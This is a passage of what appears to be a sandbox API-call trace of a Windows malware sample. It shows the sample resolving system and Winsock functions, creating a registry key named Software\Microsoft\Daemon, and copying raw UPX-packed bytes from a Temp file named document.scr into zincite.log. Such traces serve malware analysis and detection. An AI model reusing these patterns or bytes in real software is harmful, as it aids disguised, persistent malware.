Ordinal => 0 FunctionName => CreateFileA FunctionAddress => 0x7c801a28 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,224 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SetFileAttributesA FunctionAddress => 0x7c812812 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,224 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => lstrlenA FunctionAddress => 0x7c80be46 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,224 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetTempPathA FunctionAddress => 0x7c835de2 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,224 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetWindowsDirectoryA FunctionAddress => 0x7c82134b ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,224 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => lstrcpyA FunctionAddress => 0x7c80be91 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,234 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetModuleFileNameA FunctionAddress => 0x7c80b55f ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,234 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ExitThread FunctionAddress => 0x7c80c0e8 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,234 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetProcAddress FunctionAddress => 0x7c80ae30 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetModuleHandleA FunctionAddress => 0x7c80b731 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => Sleep FunctionAddress => 0x7c802446 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateThread FunctionAddress => 0x7c8106c7 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ExitProcess FunctionAddress => 0x7c81cafa ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetTimeZoneInformation FunctionAddress => 0x7c8350d7 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => FileTimeToSystemTime FunctionAddress => 0x7c80e87c ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,244 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => FileTimeToLocalFileTime FunctionAddress => 0x7c80e8f6 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetLocalTime FunctionAddress => 0x7c80a864 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetTickCount FunctionAddress => 0x7c80932e ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => WideCharToMultiByte FunctionAddress => 0x7c80a164 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InterlockedIncrement FunctionAddress => 0x7c8097f6 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => ReadFile FunctionAddress => 0x7c801812 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SetFilePointer FunctionAddress => 0x7c810c1e ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => HeapFree FunctionAddress => 0x7c90ff0d ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetProcessHeap FunctionAddress => 0x7c80ac51 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => HeapAlloc FunctionAddress => 0x7c9100a4 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => lstrcpynA FunctionAddress => 0x7c8101a1 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => lstrcmpA FunctionAddress => 0x7c830d64 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => lstrcmpiA FunctionAddress => 0x7c80bb31 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => SetThreadPriority FunctionAddress => 0x7c80c198 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetCurrentThread FunctionAddress => 0x7c80997b ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GlobalFree FunctionAddress => 0x7c80fcbf ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InterlockedDecrement FunctionAddress => 0x7c80980a ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetTempFileNameA FunctionAddress => 0x7c861807 ModuleHandle => 0x7c800000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrLoadDll |
Flags => 1245004 BaseAddress => 0x77dd0000 FileName => ADVAPI32.dll |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegCloseKey FunctionAddress => 0x77dd6c17 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegOpenKeyExA FunctionAddress => 0x77dd7842 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegSetValueExA FunctionAddress => 0x77ddead7 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,254 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegQueryValueExA FunctionAddress => 0x77dd7aab ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,264 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegEnumKeyA FunctionAddress => 0x77de5398 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,264 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => RegCreateKeyExA FunctionAddress => 0x77dde9e4 ModuleHandle => 0x77dd0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrLoadDll |
Flags => 1245004 BaseAddress => 0x77c10000 FileName => MSVCRT.dll |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => memset FunctionAddress => 0x77c475f0 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => tolower FunctionAddress => 0x77c1c9c9 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => memcpy FunctionAddress => 0x77c46f70 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => isdigit FunctionAddress => 0x77c1bbd6 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => strchr FunctionAddress => 0x77c47660 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => isalnum FunctionAddress => 0x77c1bceb ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,274 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => isspace FunctionAddress => 0x77c1bc63 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => malloc FunctionAddress => 0x77c2c407 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => strstr FunctionAddress => 0x77c47c60 ModuleHandle => 0x77c10000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrLoadDll |
Flags => 1245004 BaseAddress => 0x7e410000 FileName => USER32.dll |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CharUpperBuffA FunctionAddress => 0x7e41ae3f ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CharUpperA FunctionAddress => 0x7e418d2b ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CharLowerA FunctionAddress => 0x7e428717 ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => wvsprintfA FunctionAddress => 0x7e41a610 ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => wsprintfA FunctionAddress => 0x7e41a8ad ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => FindWindowA FunctionAddress => 0x7e4282e1 ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => PostMessageA FunctionAddress => 0x7e42aafd ModuleHandle => 0x7e410000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrLoadDll |
Flags => 1245004 BaseAddress => 0x71ab0000 FileName => WS2_32.dll |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 4 FunctionName => FunctionAddress => 0x71ab4a07 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 19 FunctionName => FunctionAddress => 0x71ab4c27 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,284 | 504 | LdrGetProcedureAddress |
Ordinal => 11 FunctionName => FunctionAddress => 0x71ab2ee1 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,294 | 504 | LdrGetProcedureAddress |
Ordinal => 52 FunctionName => FunctionAddress => 0x71ab5355 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,294 | 504 | LdrGetProcedureAddress |
Ordinal => 23 FunctionName => FunctionAddress => 0x71ab4211 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,294 | 504 | LdrGetProcedureAddress |
Ordinal => 18 FunctionName => FunctionAddress => 0x71ab30a8 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,294 | 504 | LdrGetProcedureAddress |
Ordinal => 16 FunctionName => FunctionAddress => 0x71ab676f ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,294 | 504 | LdrGetProcedureAddress |
Ordinal => 3 FunctionName => FunctionAddress => 0x71ab3e2b ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | LdrGetProcedureAddress |
Ordinal => 15 FunctionName => FunctionAddress => 0x71ab2e53 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | LdrGetProcedureAddress |
Ordinal => 9 FunctionName => FunctionAddress => 0x71ab2e53 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | LdrGetProcedureAddress |
Ordinal => 20 FunctionName => FunctionAddress => 0x71ab2f51 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | LdrGetProcedureAddress |
Ordinal => 115 FunctionName => FunctionAddress => 0x71ab6a55 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | LdrGetProcedureAddress |
Ordinal => 57 FunctionName => FunctionAddress => 0x71ab5449 ModuleHandle => 0x71ab0000 |
SUCCESS | 0x00000000 | |
| 07:43:04,304 | 504 | WSAStartup |
VersionRequested => 0x00000101 |
SUCCESS | 0x00000000 | |
| 07:43:04,314 | 504 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Daemon |
FAILURE | 0x00000002 | |
| 07:43:04,314 | 504 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Daemon |
FAILURE | 0x00000002 | |
| 07:43:04,314 | 504 | RegCreateKeyExA |
Handle => 0x00000084 Access => 131078 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Daemon |
SUCCESS | 0x00000000 | |
| 07:43:04,314 | 504 | RegCloseKey |
Handle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,314 | 504 | RegCreateKeyExA |
Handle => 0x00000084 Access => 131078 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Daemon |
SUCCESS | 0x00000000 | |
| 07:43:04,324 | 504 | RegCloseKey |
Handle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,324 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\document.scr DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,334 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\zincite.log DesiredAccess => 0xc0100080 CreateDisposition => 5 FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,334 | 504 | NtSetInformationFile |
FileHandle => 0x00000084 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:04,334 | 504 | NtReadFile |
Buffer => \xd8\x00\x00\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,334 | 504 | NtSetInformationFile |
FileHandle => 0x00000084 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:04,334 | 504 | NtReadFile |
Buffer => PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtSetInformationFile |
FileHandle => 0x00000084 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtReadFile |
Buffer => UPX0\x00\x00\x00\x00\x00\x80\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\xe0 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtReadFile |
Buffer => UPX1\x00\x00\x00\x00\x00`\x00\x00\x00\x90\x00\x00\x00`\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xe0 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtReadFile |
Buffer => .rsrc\x00\x00\x00\x00\x10\x00\x00\x00\xf0\x00\x00\x00\x08\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtSetInformationFile |
FileHandle => 0x00000084 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:43:04,344 | 504 | NtReadFile |
Buffer => \xc2\xb5\x8b\x10\xfd\xe2\x7f\xb0=\x95\xf0\x10\xc2\xeb\xb7\x9e=\xaf\x8cT=\xce\x03\xcc\xc2\xe2\xbc\x8c=2\x8b\xef\x95\xbeo\xa5\xaa\xe9\x90,\x15A\x90[\xaa\xe9\x91]q\x04?O\xc3\xbf\xe6\x8de\xc3\xd7\xe4\xaa\xe9\x90'/S\x00]\xc0\xdd\xd6\x86\xdf\xac\x15\xa0\xc0\x99.\x11\x00\x11;\xb0\x10\x04\xfe\x83\x12\xce\xa3\xa5{N\x05\xe8\x83\xf9a\xc7gC\xa6\xec\xbc\xae\x9f|l\x11\xa4\xa1\xbc\xae\x9e5l#\xac\x12gC\x0e\x90\xd7\xe4\xb4\x0f\x04\x9d\xab\x8f\xe0'\x19\xb0\xff\x92\x1f\x1fR\x9c^\x87\xebR\x15 \xf4\xa4P\x17\xf1bT\x1e\xeb\x11\x95k\xc2\xa7\x00]&\x1e\xce\x14\x96\xba\xdb19\xa8\xb4\xdf-\xf9\xd2\x837X\xff\xa7&\x1d\xcf\xae\xfd\xf0\xfe\xc7\xbc\x99\xbb\xf2X#:\xe4L\x06t\x01\x83\xceD\x84G\x96\x0fzL\xa3\x92\xec\xe8\x84\xa0~S\xd5A\xa4\x9b\x87\xa9:tO\xc7\x11t\xcd\x0b\xcet\x06\x97\xe7t\xee\xdd\xeek\xbfX\xaa`\x88\x18\x80 \xb6G\x9f FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,354 | 504 | NtWriteFile |
Buffer => \xc2\xb5\x8b\x10\xfd\xe2\x7f\xb0=\x95\xf0\x10\xc2\xeb\xb7\x9e=\xaf\x8cT=\xce\x03\xcc\xc2\xe2\xbc\x8c=2\x8b\xef\x95\xbeo\xa5\xaa\xe9\x90,\x15A\x90[\xaa\xe9\x91]q\x04?O\xc3\xbf\xe6\x8de\xc3\xd7\xe4\xaa\xe9\x90'/S\x00]\xc0\xdd\xd6\x86\xdf\xac\x15\xa0\xc0\x99.\x11\x00\x11;\xb0\x10\x04\xfe\x83\x12\xce\xa3\xa5{N\x05\xe8\x83\xf9a\xc7gC\xa6\xec\xbc\xae\x9f|l\x11\xa4\xa1\xbc\xae\x9e5l#\xac\x12gC\x0e\x90\xd7\xe4\xb4\x0f\x04\x9d\xab\x8f\xe0'\x19\xb0\xff\x92\x1f\x1fR\x9c^\x87\xebR\x15 \xf4\xa4P\x17\xf1bT\x1e\xeb\x11\x95k\xc2\xa7\x00]&\x1e\xce\x14\x96\xba\xdb19\xa8\xb4\xdf-\xf9\xd2\x837X\xff\xa7&\x1d\xcf\xae\xfd\xf0\xfe\xc7\xbc\x99\xbb\xf2X#:\xe4L\x06t\x01\x83\xceD\x84G\x96\x0fzL\xa3\x92\xec\xe8\x84\xa0~S\xd5A\xa4\x9b\x87\xa9:tO\xc7\x11t\xcd\x0b\xcet\x06\x97\xe7t\xee\xdd\xeek\xbfX\xaa`\x88\x18\x80 \xb6G\x9f FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtReadFile |
Buffer => n\x150\x05\x81\xb1 \x11\x8a\xaf\xf2d\x95\x1a\x81nQB\xcfzQB\xce\xf1:\x085\xc0\x81\xba.\xd9\xb8k\xc4W\xec\x7f\x1fp\x87<:\xa6\x87<:\xad\x87<;\xc3Cdu\x9f\x87<;\xa3Cdu\x17d \xeb\xd6\x80\xb3\xc9Z0\x14\xe5`[^\x14\xa4\x8b`\x86]\x94}\xf8\x140\x14\xc8\x8f\x8b\xc5\xd5\x1f\x84\xccn\xe2\x7f\xc3\xda\xd7:4\x0f\x94q/\x91\x93kv\x9b\xf0khS\xfd\x7f\xc3\xdfYt\x14\xf6\xed \xdd\x06\x87\xcf\xe1\xa8\x17\xd0\xa2\xe5:\xdb\xd2\xb7\xe5\x1f\x8a\xf9\x0c\xc4d\x83\xc4\xd0\xd69\xf7\xd0\xe4\xf7\x02~\xd6_:\x1e\xaf\x04B*\xcb\xa0\x15\x99\x80MhA\x81\xa0\xbc\x1e\xaf\x05\xb2\x91\xbf"\x1b(\xd7\x03\xad\xa4\xf88\x04T\x9b\x86\xa4\xf0\xe531\xf0\xec\xd5\x8dK\\x04\xa1\xf0\xe5\xee\xa5\x9b\xaf\xc6\xd9\x9b\xaf\xc6p\x15\xe1\xb7\x93\xf1[\xd3N\xf1[s\xdf\xe5bU1u\x98\xecq\xfa.A[\xfa\x0cC\xf8\xfa\x0cB\x15 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtWriteFile |
Buffer => n\x150\x05\x81\xb1 \x11\x8a\xaf\xf2d\x95\x1a\x81nQB\xcfzQB\xce\xf1:\x085\xc0\x81\xba.\xd9\xb8k\xc4W\xec\x7f\x1fp\x87<:\xa6\x87<:\xad\x87<;\xc3Cdu\x9f\x87<;\xa3Cdu\x17d \xeb\xd6\x80\xb3\xc9Z0\x14\xe5`[^\x14\xa4\x8b`\x86]\x94}\xf8\x140\x14\xc8\x8f\x8b\xc5\xd5\x1f\x84\xccn\xe2\x7f\xc3\xda\xd7:4\x0f\x94q/\x91\x93kv\x9b\xf0khS\xfd\x7f\xc3\xdfYt\x14\xf6\xed \xdd\x06\x87\xcf\xe1\xa8\x17\xd0\xa2\xe5:\xdb\xd2\xb7\xe5\x1f\x8a\xf9\x0c\xc4d\x83\xc4\xd0\xd69\xf7\xd0\xe4\xf7\x02~\xd6_:\x1e\xaf\x04B*\xcb\xa0\x15\x99\x80MhA\x81\xa0\xbc\x1e\xaf\x05\xb2\x91\xbf"\x1b(\xd7\x03\xad\xa4\xf88\x04T\x9b\x86\xa4\xf0\xe531\xf0\xec\xd5\x8dK\\x04\xa1\xf0\xe5\xee\xa5\x9b\xaf\xc6\xd9\x9b\xaf\xc6p\x15\xe1\xb7\x93\xf1[\xd3N\xf1[s\xdf\xe5bU1u\x98\xecq\xfa.A[\xfa\x0cC\xf8\xfa\x0cB\x15 FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtReadFile |
Buffer => \x1eU\x06S!\x02\xf8\xa4JH\xee\xb9!\x02\xf8\xea\xf1\xef\xf38!\x02\xf8\xa8\xfa\xefj\xa1\xe5Z\xb7\xe7\xa7{I\xb3\x98,\xb7N\x98,\xb7T\xf4\x94\x96f\xd6 \x05\x86W\x0c\xcf\xfc\x98,\xb7\x11C\xc1N\xd4\xe6\xa2\xde\xf4\x02\x188>\xb2\xbf\x0fx\x02\x18]\x07\x01\xde\xf3\x8d\x02\x1bc\xd4\x16\x99$g\xd9\xf5!d\xbd\x99\x1dJR\xac\xb7.Y#\xf2\x81R\x7f3|M\x92'R\xe9\x846\xbc\x82\xce\xe2\xd2F\x96\xa9\xee\x82d'Yf\xde\xccfyk\x96\xd1\xbd3\xd9\xa0\xbd3\xd9\xb4yk\x96vf\xdd\xaa\x91\xbd3\xd9\xa5\x8e/b\xa7\xb1x\x9cI\xb1x\x9d\xd4u \xd6\x10j\x95\xac\x80\xb1x\x9d&j\x95\xf3@al\xe8\x0cd\xa8
-\x94\xc7x\xb6\x9f\xa7\xbe\xe1\x80\x11\xa4\xde\x9f\xa7\xbe3\x8b3\x149\x94\x92#L\x94\x92)\xf2\xcd\xa3\x18@"e
\xff\x99\xbe\xb3\xe3"k)\xef)\x19
\xed)\x19\xfa\x8e8@\xe7\xed\xf2\xf4\xe7\xc0 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtWriteFile |
Buffer => \x1eU\x06S!\x02\xf8\xa4JH\xee\xb9!\x02\xf8\xea\xf1\xef\xf38!\x02\xf8\xa8\xfa\xefj\xa1\xe5Z\xb7\xe7\xa7{I\xb3\x98,\xb7N\x98,\xb7T\xf4\x94\x96f\xd6 \x05\x86W\x0c\xcf\xfc\x98,\xb7\x11C\xc1N\xd4\xe6\xa2\xde\xf4\x02\x188>\xb2\xbf\x0fx\x02\x18]\x07\x01\xde\xf3\x8d\x02\x1bc\xd4\x16\x99$g\xd9\xf5!d\xbd\x99\x1dJR\xac\xb7.Y#\xf2\x81R\x7f3|M\x92'R\xe9\x846\xbc\x82\xce\xe2\xd2F\x96\xa9\xee\x82d'Yf\xde\xccfyk\x96\xd1\xbd3\xd9\xa0\xbd3\xd9\xb4yk\x96vf\xdd\xaa\x91\xbd3\xd9\xa5\x8e/b\xa7\xb1x\x9cI\xb1x\x9d\xd4u \xd6\x10j\x95\xac\x80\xb1x\x9d&j\x95\xf3@al\xe8\x0cd\xa8
-\x94\xc7x\xb6\x9f\xa7\xbe\xe1\x80\x11\xa4\xde\x9f\xa7\xbe3\x8b3\x149\x94\x92#L\x94\x92)\xf2\xcd\xa3\x18@"e
\xff\x99\xbe\xb3\xe3"k)\xef)\x19
\xed)\x19\xfa\x8e8@\xe7\xed\xf2\xf4\xe7\xc0 FileHandle => 0x00000088 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtReadFile |
Buffer => \xa6l\xc6
V_E\xe1\xf2q+\xf9]cr\x88\x99;9\x80]cr\x07B\xd6m\xd6]cr\x188G\xc8\x89\xd7\x03:\xa0\x07\x107oF\x92\xe7\xc0\xd7\xe3\xf5-\xc3HyG\x07\x106\x07\xc8}\xe0\x91\xe2\xaf\xf0\x02
\xc6\xca\xebY\xca\xb7\xd4
#\xcfc\xb6\xb2av\x17P\x0f\xd6\x06\x15\xc3\xf4\xb6\xb2x\x9bH\x8a)\x19\xa7\xb4T\x98\x1c\x97\x94\xba\xb3\x85\x98Tw\xdd\xd6\xf2\x1ba\xdc\xe3\xa7O\xdd\xe3\xbdu\xd6\x89\xc8;\x82\x86,\x81KY,\x81eg346\xea,\x82P\x12\x9c&\x13\x0c346,\xf7l|\xf9#P\x80t\xcc\xbdq\x02wL\x17\x89\xc7\xea\x8a\xb2\xcc\x95y\x15\xcc\x9eu\xb1\xcc\xcb\x1e\xf6\xc7\xea\xdd\xd0\x8e\x87\xf0;\xda\x93.\xa5j=\x14\x8c\xb1\xd0\x0f\xbf~\x04\x13,j=4\xf5j>V0\xb1\xd0\x0e\xce\x9d\xd1\xd7\x11\xa2\x86*\x9c\xf9\xfe\xfa\xa2\xa2\x86)\xfam\x18\xb57\xa2\x86)\xe1f\xdec\xb0\xc9\xcc>\x17 FileHandle => 0x00000084 |
SUCCESS | 0x00000000 | |
| 07:43:04,384 | 504 | NtWriteFile |
Buffer => \xa6l\xc6
V_E\xe1\xf2q+\xf9]cr\x88\x99;9\x80]cr\x07B\xd6m\xd6]cr\x188G\xc8\x89\xd7\x03:\xa0\x07\x107oF\x92\xe7\xc0\xd7\xe3\xf5-\xc3HyG\x07\x106\x07\xc8}\xe0\x91\xe2\xaf\xf0\x02
\xc6\xca\xebY\xca\xb7\xd4
#\xcfc\xb6\xb2av\x17P\x0f\xd6\x06\x15\xc3\xf4\xb6\xb2x\x9bH\x8a)\x19\xa7\xb4T\x98\x1c\x97\x94\xba\xb3\x85\x98Tw\xdd\xd6\xf2\x1ba\xdc\xe3\xa7O\xdd\xe3\xbdu\xd6\x89\xc8;\x82\x86,\x81KY,\x81eg346\xea,\x82P\x12\x9c&\x13\x0c346,\xf7l|\xf9#P\x80t\xcc\xbdq\x02wL\x17\x89\xc7\xea\x8a\xb2\xcc\x95y\x15\xcc\x9eu\xb1\xcc\xcb\x1e\xf6\xc7\xea\xdd\xd0\x8e\x87\xf0;\xda\x93.\xa5j=\x14\x8c\xb1\xd0\x0f\xbf~\x04\x13,j=4\xf5j>V0\xb1\xd0\x0e\xce\x9d\xd1\xd7\x11\xa2\x86*\x9c\xf9\xfe\xfa\xa2\xa2\x86)\xfam\x18\xb57\xa2\x86)\xe1f\xdec\xb0\xc9\xcc>\x17 FileHandle => 0x00000088 |
